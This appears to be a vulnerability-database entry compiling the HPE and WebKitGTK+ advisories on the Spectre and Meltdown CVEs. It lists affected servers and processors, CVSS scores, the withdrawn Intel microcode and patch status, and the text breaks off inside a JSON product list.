- HPE ProLiant DL160 Gen10 Server - To be delivered
- HPE ProLiant DL360 Gen10 Server - To be delivered
- HPE ProLiant ML110 Gen10 Server - To be delivered
- HPE ProLiant DL580 Gen10 Server - To be delivered
- HPE ProLiant DL560 Gen10 Server - To be delivered
- HPE ProLiant DL120 Gen10 Server - To be delivered
- HPE ProLiant ML350 Gen10 Server - To be delivered
- HPE ProLiant XL450 Gen10 Server - To be delivered
- HPE Synergy 660 Gen10 Compute Module - To be delivered
- HPE ProLiant DL385 Gen10 Server - prior to v1.04
- HPE ProLiant XL170r Gen10 Server - To be delivered
- HPE ProLiant BL460c Gen10 Server Blade - To be delivered
- HPE ProLiant XL190r Gen10 Server - To be delivered
- HPE ProLiant XL230k Gen10 Server - To be delivered
- HPE Synergy 480 Gen10 Compute Module - To be delivered
- HPE ProLiant XL730f Gen9 Server - To be delivered
- HPE ProLiant XL230a Gen9 Server - To be delivered
- HPE ProLiant XL740f Gen9 Server - To be delivered
- HPE ProLiant XL750f Gen9 Server - To be delivered
- HPE ProLiant XL170r Gen9 Server - To be delivered
- HP ProLiant DL60 Gen9 Server - To be delivered
- HP ProLiant DL160 Gen9 Server - To be delivered
- HPE ProLiant DL360 Gen9 Server - To be delivered
- HP ProLiant DL380 Gen9 Server - To be delivered
- HPE ProLiant XL450 Gen9 Server - To be delivered
- HPE Apollo 4200 Gen9 Server - To be delivered
- HP ProLiant BL460c Gen9 Server Blade - To be delivered
- HP ProLiant ML110 Gen9 Server - To be delivered
- HP ProLiant ML150 Gen9 Server - To be delivered
- HPE ProLiant ML350 Gen9 Server - To be delivered
- HP ProLiant DL120 Gen9 Server - To be delivered
- HPE ProLiant DL560 Gen9 Server - To be delivered
- HP ProLiant BL660c Gen9 Server - To be delivered
- HPE ProLiant ML30 Gen9 Server - To be delivered
- HPE ProLiant XL170r Gen10 Server - To be delivered
- HPE ProLiant DL20 Gen9 Server - To be delivered
- HPE Synergy 660 Gen9 Compute Module - To be delivered
- HPE Synergy 480 Gen9 Compute Module - To be delivered
- HPE ProLiant XL250a Gen9 Server - To be delivered
- HPE ProLiant XL190r Gen9 Server - To be delivered
- HP ProLiant DL80 Gen9 Server - To be delivered
- HPE ProLiant DL180 Gen9 Server - To be delivered
- HPE ProLiant XL270d Gen9 Accelerator Tray 2U Configure-to-order Server - To be delivered
- HPE ProLiant WS460c Gen9 Workstation - To be delivered
- HPE ProLiant XL260a Gen9 Server - To be delivered
- HPE Synergy 620 Gen9 Compute Module - To be delivered
- HPE ProLiant DL580 Gen9 Server - To be delivered
- HP ProLiant XL220a Gen8 v2 Server - To be delivered
- HPE Synergy 680 Gen9 Compute Module - To be delivered
- HPE ProLiant m510 Server Cartridge - To be delivered
- HPE ProLiant m710p Server Cartridge - To be delivered
- HPE ProLiant m710x Server Cartridge - To be delivered
- HP ProLiant m710 Server Cartridge - To be delivered
- HP ProLiant DL980 G7 Server - To be delivered
- HPE Synergy Composer - To be delivered
- HPE ProLiant Thin Micro TM200 Server - To be delivered
- HPE ProLiant ML10 v2 Server - To be delivered
- HPE ProLiant m350 Server Cartridge - To be delivered
- HPE ProLiant m300 Server Cartridge - To be delivered
- HPE ProLiant MicroServer Gen8 - To be delivered
- HPE ProLiant ML310e Gen8 v2 Server - To be delivered
- HPE Superdome Flex Server - To be delivered
- HP 3PAR StoreServ File Controller - To be delivered - v3 impacted
- HPE StoreVirtual 3000 File Controller - To be delivered
- HPE StoreEasy 1450 Storage - To be delivered
- HPE StoreEasy 1550 Storage - To be delivered
- HPE StoreEasy 1650 Storage - To be delivered
- HPE StoreEasy 3850 Gateway Storage - To be delivered
- HPE StoreEasy 1850 Storage - To be delivered
- HP ConvergedSystem 700 - To be delivered
- HPE Converged Architecture 700 - To be delivered
- HP ProLiant DL580 Gen8 Server - To be delivered
- HPE Cloudline CL2100 Gen10 Server - To be delivered
- HPE Cloudline CL2200 Gen10 Server - To be delivered
- HPE Cloudline CL3150 G4 Server - To be delivered
- HPE Cloudline CL5200 G3 Server - To be delivered
- HPE Cloudline CL3100 G3 Server - To be delivered
- HPE Cloudline CL2100 G3 807S 8 SFF Configure-to-order Server - To be delivered
- HPE Cloudline CL2100 G3 407S 4 LFF Configure-to-order Server - To be delivered
- HPE Cloudline CL2100 G3 806R 8SFF Configure-to-order Server - To be delivered
- HPE Cloudline CL2200 G3 1211R 12 LFF Configure-to-order Server - To be delivered
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2017-5715
8.2 CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
6.8 (AV:A/AC:L/Au:N/C:C/I:P/A:N)
CVE-2017-5753
5.0 CVSS:3.0/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L
5.4 (AV:A/AC:M/Au:N/C:P/I:P/A:P)
CVE-2017-5754
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
On January 11, Intel announced issues with an increased frequency of reboots when using the microcodes they released to address Variant 2 of the Spectre Vulnerability for numerous processors including Broadwell, Haswell, Skylake, Kaby Lake, Ivybridge, and Sandybridge processors. Intel has now identified the root cause of these issues and determined that these microcodes may introduce reboots and other unpredictable system behavior. Due to the severity of the potential issues that may occur when using these microcodes, Intel is now recommending that customers discontinue their use. Additional information is available from Intels Security Exploit Newsroom here: https://newsroom.intel.com/press-kits/security-exploits-intel-products/ . HPE is in alignment with Intel in our recommendation that customers discontinue use of System ROMs including impacted microcodes and revert to earlier System ROM versions.
All System ROMs including impacted microcodes have been removed from the HPE Support Site. This impacts HPE ProLiant and Synergy Gen10, Gen9, and Gen8 v2 servers as well as HPE Superdome servers for which updated System ROMs had previously been made available. Intel is working on updated microcodes to address these issues, and HPE will validate updated System ROMs including these microcodes and make them available to our customers in the coming weeks.
Mitigations for Variant 1 (Spectre) and Variant 3 (Meltdown) vulnerabilities require only OS updates and are not impacted.
-
HPE has provided a customer bulletin https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a00039267en_us with specific instructions to obtain the udpated sytem ROM
-
Note:
- CVE-2017-5715 (Variant 2) requires that the System ROM be updated and a vendor supplied operating system update be applied as well.
- For CVE-2017-5753, CVE-2017-5754 (Variants 1 and 3) require only updates of a vendor supplied operating system.
- HPE will continue to add additional products to the list.
HISTORY
Version:1 (rev.1) - 4 January 2018 Initial release
Version:2 (rev.2) - 5 January 2018 Added additional impacted products
Version:3 (rev.3) - 10 January 2018 Added more impacted products
Version:4 (rev.4) - 9 January 2018 Fixed product ID
Version:5 (rev.5) - 18 January 2018 Added additional impacted products
Version:6 (rev.6) - 19 January 2018 updated impacted product list
Version:7 (rev.7) - 23 January 2018 Marked impacted products with TBD for System ROM updates per Intel's guidance on microcode issues
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Several vulnerabilities were discovered in WebKitGTK+.
CVE-2017-5753 Versions affected: WebKitGTK+ before 2.18.5. Credit to Jann Horn of Google Project Zero; and Paul Kocher in collaboration with Daniel Genkin of University of Pennsylvania and University of Maryland, Daniel Gruss of Graz University of Technology, Werner Haas of Cyberus Technology, Mike Hamburg of Rambus (Cryptography Research Division), Moritz Lipp of Graz University of Technology, Stefan Mangard of Graz University of Technology, Thomas Prescher of Cyberus Technology, Michael Schwarz of Graz University of Technology, and Yuval Yarom of University of Adelaide and Data61. Description: Security improvements are included to mitigate the effects.
CVE-2017-5715 Versions affected: WebKitGTK+ before 2.18.5. Credit to Jann Horn of Google Project Zero; and Paul Kocher in collaboration with Daniel Genkin of University of Pennsylvania and University of Maryland, Daniel Gruss of Graz University of Technology, Werner Haas of Cyberus Technology, Mike Hamburg of Rambus (Cryptography Research Division), Moritz Lipp of Graz University of Technology, Stefan Mangard of Graz University of Technology, Thomas Prescher of Cyberus Technology, Michael Schwarz of Graz University of Technology, and Yuval Yarom of University of Adelaide and Data61. Description: Security improvements are included to mitigate the effects.
We recommend updating to the last stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information about the last stable releases.
Further information about WebKitGTK+ Security Advisories can be found at: https://webkitgtk.org/security.html
The WebKitGTK+ team, January 10, 2018
. 7.2) - noarch, x86_64
3
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201801-1712", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "solaris", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "11.3" }, { "model": "esxi", "scope": "eq", "trust": 1.3, "vendor": "vmware", "version": "6.0" }, { "model": "solaris", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "10" }, { "model": "esxi", "scope": "eq", "trust": 1.3, "vendor": "vmware", "version": "6.5" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5287u" }, { "model": "xeon e5 2470 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2687w_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3450" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5540" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2655le" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8880l_v3" }, { "model": "xeon e3 1270 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4669_v4" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4350u" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e6510" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2435m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "875k" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5503" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6148" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4980hq" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4360" }, { "model": "xeon e5 1660 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3850" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5687" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2617m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3770" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "ec5509" }, { "model": "xeon e3 1260l v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2695_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "670" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4422e" }, { "model": "cortex-a15", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "bl bpc 7000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "cortex-a72", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2718" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1585l_v5" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3230m" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5518" }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j4005" }, { "model": "cortex-a75", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3317u" }, { "model": "xeon e3 1226 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1241 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4870" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2699_v4" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1535m_v5" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4900mq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3612qm" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3380m" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2690_v4" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4330m" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8867l" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2687w_v3" }, { "model": "linux enterprise software development kit", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "xeon e-1105c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4012y" }, { "model": "xeon e5 1650", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "el ppc 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4670r" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7250" }, { "model": "vl2 ppc 7000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "bl bpc 7001", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4722hq" }, { "model": "xeon e3 1501m v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core m3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6y30" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4790t" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4809_v4" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8880_v4" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6154" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3220" }, { "model": "xeon e5 2448l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8160t" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2312m" }, { "model": "xeon e3 1285l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4655_v4" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8180" }, { "model": "vl2 ppc7 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6300t" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3405" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3350" }, { "model": "xeon e3 1230 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "vl2 ppc 9000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8891_v3" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5638" }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j1750" }, { "model": "xeon e5 2403", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6350hq" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8860" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6146" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4570r" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5550" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6140" }, { "model": "vl2 bpc 2000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3350p" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5630" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6136" }, { "model": "cortex-a17", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "980" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4120u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4670" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "w5580" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "820qm" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2640m" }, { "model": "xeon e3 1280 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "w3680" }, { "model": "core m3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7y30" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2850" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2338" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5122" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4809_v3" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4160" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4657l_v2" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4158u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6400t" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4610m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4960hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5750hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "640um" }, { "model": "xeon e3 1230 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4360u" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4830_v3" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4627_v4" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l7555" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6142m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3667u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4300y" }, { "model": "bl ppc15 7000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3160" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2367m" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3740" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4130" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6102e" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "560um" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4460s" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3687u" }, { "model": "xeon e3 1225 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6100u" }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y10" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5618" }, { "model": "xeon e5 2418l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2648l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom e", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e3827" }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4114t" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4610" }, { "model": "xeon e5 2618l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2806" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2350m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3340s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6200u" }, { "model": "xeon e5 2440", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "simatic itc1900 pro", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "3.1" }, { "model": "vl2 ppc12 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e5 2603 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7210" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2890_v2" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x6550" }, { "model": "linux enterprise server", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8250u" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2348m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4690t" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4771" }, { "model": "xeon e3 1285 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "17.04" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6130f" }, { "model": "xeon e5 2618l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2640 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2618l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "btc12", "scope": "eq", "trust": 1.0, "vendor": "pepperl fuchs", "version": null }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j1850" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6134" }, { "model": "xeon e3 1276 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "bl ppc12 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3460" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1575m_v5" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2690" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4627_v3" }, { "model": "xeon e3 1240 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2620 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4702mq" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4627_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2820qm" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4807" }, { "model": "xeon e5 2407 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4712mq" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2380p" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2115c" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2520m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "680um" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "640m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2715qe" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3227u" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2820" }, { "model": "bl ppc17 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "430um" }, { "model": "xeon e5 2430l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4860_v2" }, { 